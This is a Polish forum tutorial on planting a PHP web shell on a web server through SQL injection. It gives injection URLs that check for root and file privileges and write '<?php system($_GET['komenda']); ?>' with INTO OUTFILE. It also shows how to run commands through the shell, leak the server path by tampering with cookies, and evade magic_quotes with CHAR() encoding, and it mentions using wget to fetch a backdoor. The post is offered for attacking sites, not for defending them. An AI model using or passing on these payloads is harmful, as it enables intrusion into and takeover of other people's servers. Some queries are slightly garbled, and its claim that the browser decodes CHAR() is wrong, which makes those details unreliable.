[Tutoral praktyczny] Jak zuploadowac plik na serwer przy pomocy błędów SQL Injection

[gosciuuu]

Tutek mojego autorstwa, proszę o przeniesienie do "tutoriale"
Tutorial nie jest pisany dla żółtodziobów musisz posiadać podstawową wiedzę na temat PHP i języka SQL.

1.Musimy znaleźć pełną ścieżkę bieżącego użytkownika.
2.Musimy sprawdzić, czy serwer ma "magiczne cudzysłowia".
3.Skrypt musi wykonywać się na koncie ROOTA.

Na początku trzeba wyjasnić kilka podsatwowych rzeczy. Po pierwsze musimy dowiedzieć się, czy nasz użytkownik jest rootem (użytkownik na którym działa skrypt storny) można
zrobić za pomocą następującego zapytania:

przykladowastrona.pl/blednyskrypt.php?id=1 and 1=0 union all select 1,2,3,4,user,6,7,8,9,10,11,12,13 from mysql.user—
Jak już mówiłem art nie jest skierowany do ludzi zielonych mogę powiedzieć tylko, że polecenie union służy do tego by zamienić tabelki w bazie danych np, mamy taki układ w bazie danych do którego skrypt się odwołuje przy logowaniu
ID,USER,PASSWORD,MAIL,STATUS Polecenie union pozwala np zamienić nam "ID" z REKORDAMI O NAZWIE "PASSWORD". Więc jeśli mamy podatność w skrypcie np newsów które wyświetlają ID newsa dzięki temu po wykorzystaniu błędu będziemy mogli widzieć np HASLO to tak w ramach przypomnienia bo ten tutorial nie dotyczy wyświetlania hasła tylko ładowania pliku na serwer.

Więc załóżmy teraz, że po wykorzystaniu tego kodu okazuje się, że skrypt siedzi na koncie root,
Teraz, gdy wiemy, że to jest root, możemy sprawdzić swoje uprawnienia za pomocą następującej "komendy" a raczej zapytania
przykladowastrona.pl/blednyskrypt.php?id=1 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,user,file_priv),6,7,8,9,10,1 1,12,13—

Jeśli wyświetli nam się nazwa użytkownika który jest rootem będzie wyglądało to tak:
ktos/Y

A jeśli jest rootem to będziemy mogli korzystać z INTO OUTFILE i załadować powłokę (shella), teraz trzeba kontynuować i zobaczyć, czy możemy znaleźć pełną ścieżkę by móc załadować powłokę.
Słów pare o INTO OUTFILE pozwala to utworzyć plik na serwerze z parametru URL możemy podać zawartość tego pliku czyli w naszym wypadku skryptu shella.
Jedynym warunkiem jest podanie pełnej scieżki do pliku zaczynając od katalogu domowego w systemie LINUX (zakładamy ze storna stoi na linuxie) który nazywa się HOME

przykladowastrona.pl/blednyskrypt.php?id=1 and 1=0 union all select 1,2,3,4,”TUTAJ OSADZMY KOD ZAWARTOSCI PLIKU SHELL.php”,6,7,8,9,10,11,12,13 INTO OUTFILE /home/ktos/public_html/shell.php--

/home/ nazwa katalogu domowego
/ktos/ nazwa uzytkowniak
/public_html/ tutaj leżą wszystkie pliki na serwerze
/shell.php nasz wygenerowany srkypt

Więc umieśćmy tam prosty kod który da nam przejąć "władze nad systemem na stronie"

przykladowastrona.pl/blednyskrypt.php?id=1 and 1=0 union all select 1,2,3,4, “<?php system($_GET['komenda']); ?>”,6,7,8,9,10,11,12,13 INTO OUTFILE “/home/ktos/public_html/shell.php—

Co nam do daje?
$_GET['komenda'] - jest to jak wiadomo tablica która przechowuje jakieś dane z parametru URL
funkcja system, jest to standardowa funkcja w PHP która pozwala z poziomu www sterować powłoką.
Po utworzeniu tego kodu w pliku shell.php pojawi się ta zawartość
<?php system($_GET['komenda']); ?>
jak to wykorzystać?
Skoro wiemy, że plik shell.php jest już na serwerze musimy się do niego odwołać i wywołać polecenie z parametru URL poprzez $_GET
<?php system($_GET['komenda']); ?>
Robimy to tak
przykladowastorna.pl/shell.php?komenda=ls
Co nam to dało po znaku zapytania odwołujemy się do tablicy o nazwie komenda do której wprowadza się dane jakie ma wykonać funkcja system po znaku "=" wpisujemy tę komenda, w przykładzie użyłem "LS" jest to podstawową komenda w systemach linuksowych którzy odpowiada w windowsie komendzie "dir" czyli wyświetlania listy plików w danym katalogu.
W efekcie uzyskałem taki wynik:

46 Dinitrol 7250 can 5l c.jpg
plik.pdf
plik2.pdf
blednyskrypt.php
shell.php
index.php
obrazki.jpg

Czyli liste plików w poleceniu można wpisywać wszystko np można użyć programu wget do sciągniecia jakiegoś oprogramowania backdoora itd.


Ok nic nie powiedziałem na temat tego jak uzyskać pełna scieżkę dostępu o której pisałem powyżej.
Będziemy musieli skorzystać do tego z wtyczki która jest np do firefoxa o nazwie live http headers znajdziesz ją na google.
Służy ona do tego by przechwytywać zapytania HTTP czyli to co przesyła się do serwera w momencie ładowania strony.
Otwieramy live http headers i szukamy czegoś takiego po odświeżeniu strony
PHPSESSID=32932930229303290
albo
Cookie:blablblablablabla

Klikamy na któreś z tych za pomocą przycisku edit o ile dobrze pamiętam, po czym wpisujemy tam wartośc "0" następnie naciskamy replay. Serwer przeładuje skrypt i wyświetli błąd ze względu na to, że dostał nieprawidłowe dane i przy okazji wyświetli pełną scieżkę do katalogu home/ktos/public_html ...
Oczywiście ta sztuczka nie zadziała zawsze bo zależne jest to od konfiguracji serwera.

Druga rzecz bardzo ważna o której nie wspomniałem jest pewne zabezpieczenie w konfiguracji PHP nazywa się Magic_Quotes jeśli ustawiona jest na tryb włączony na serwerze.
To zacznie ona ucinać przychodzące dane od skryptu jeśli napotka znaki specjalne takie jak <,/,? i zamieni na \<\/\? w których umieściliśmy tagi związane z php. Więc skrypt nie zapisze się na serwerze
A robiąc shella właśnie tak zrobiliśmy wpisaliśmy znaki specjalne tworząc kod
<?php system($_GET['komenda']); ?> w efekcie jeśli zakładamy, że serwer używa magic_quotes
to w skrypcie zapisz się <\?php system($_GET['komenda'\]); \?> coś takiego mniej więcej i skrypt się nie wykona.
Musimy uciec się do pewnego podstępu.
Każda przeglądarka internetowa oprócz czytania zwykłych znaków potrafii również odczytywać tablice znaków ASCII

przykladowastrona.pl/blednyskrypt.php?id=1 and 1=0 union all select 1,2,3,4, CHAR(60,63) “system($_GET[‘koemnda’]); “ CHAR(63,62),6,7,8,9,10,11,12,13 INTO OUTFILE “/home/ktos/public_html/shell.php--


Polecenia CHAR rozkazuje przeglądarce przeczytanie tego co jest w nawiasach (63, 62)
a jest tam ukryte w pierwszym nawiasie "<?" czyli kod rozpoczynający działanie skryptu PHP a on zawiera znaki specjalne natomiast jest ukryty więc magic_quotes go nie wyłapie
natomiast drugi nawias CHAR(63,62) zawiera ukryte "?>" czyli zamykanie kodu php
i w efekcie skrypt utworzy się poprawnie.